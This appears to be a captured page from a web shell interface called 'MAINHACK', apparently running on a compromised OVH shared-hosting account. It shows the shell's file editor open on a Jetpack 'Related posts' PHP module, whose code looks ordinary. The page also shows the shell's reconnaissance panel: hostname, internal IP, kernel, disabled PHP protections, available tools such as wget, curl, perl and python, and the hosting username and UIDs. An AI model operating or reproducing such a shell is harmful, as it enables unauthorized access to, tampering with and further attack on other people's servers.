[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: related-posts.php
<?php //phpcs:ignore WordPress.Files.FileName.InvalidClassFileName /** * Module Name: Related posts * Module Description: Keep visitors engaged on your blog by highlighting relevant and new content at the bottom of each published post. * First Introduced: 2.9 * Sort Order: 29 * Recommendation Order: 9 * Requires Connection: Yes * Auto Activate: No * Module Tags: Recommended * Feature: Engagement * // phpcs:ignore WordPress.WP.CapitalPDangit.Misspelled * Additional Search Queries: related, jetpack related posts, related posts for wordpress, related posts, popular posts, popular, related content, related post, contextual, context, contextual related posts, related articles, similar posts, easy related posts, related page, simple related posts, free related posts, related thumbnails, similar, engagement, yet another related posts plugin */ class Jetpack_RelatedPosts_Module { /** * Class variables * * @var Jetpack_RelatedPosts_Module */ private static $instance = null; /** * Singleton implementation * * @return object */ public static function instance() { if ( ! is_a( self::$instance, 'Jetpack_RelatedPosts_Module' ) ) { self::$instance = new Jetpack_RelatedPosts_Module(); } return self::$instance; } /** * Register actions and filters * * @uses add_action, add_filter */ private function __construct() { add_action( 'jetpack_module_loaded_related-posts', array( $this, 'action_on_load' ) ); } /** * This action triggers if the module is in an active state, load related posts and options. * * @uses Jetpack_RelatedPosts::init, is_admin, Jetpack::enable_module_configurable, Jetpack_Sync::sync_posts */ public function action_on_load() { require_once __DIR__ . '/related-posts/jetpack-related-posts.php'; Jetpack_RelatedPosts::init(); if ( is_admin() ) { Jetpack::enable_module_configurable( __FILE__ ); } // Load Customizer controls. if ( class_exists( WP_Customize_Manager::class ) && class_exists( WP_Customize_Control::class ) ) { require_once __DIR__ . '/related-posts/class.related-posts-customize.php'; } } } // Do it. Jetpack_RelatedPosts_Module::instance();
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: webm010.cluster103.gra.hosting.ovh.net
Server IP: 10.103.20.10
PHP Version: 7.4.33
Server Software: Apache
System: Linux webm010.cluster103.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
HDD Total: 14.32 GB
HDD Free: 8.45 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
Exists
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: cuisinesj
User ID (UID): 17129
Group ID (GID): 100
Script Owner UID: 17129
Current Dir Owner: 17129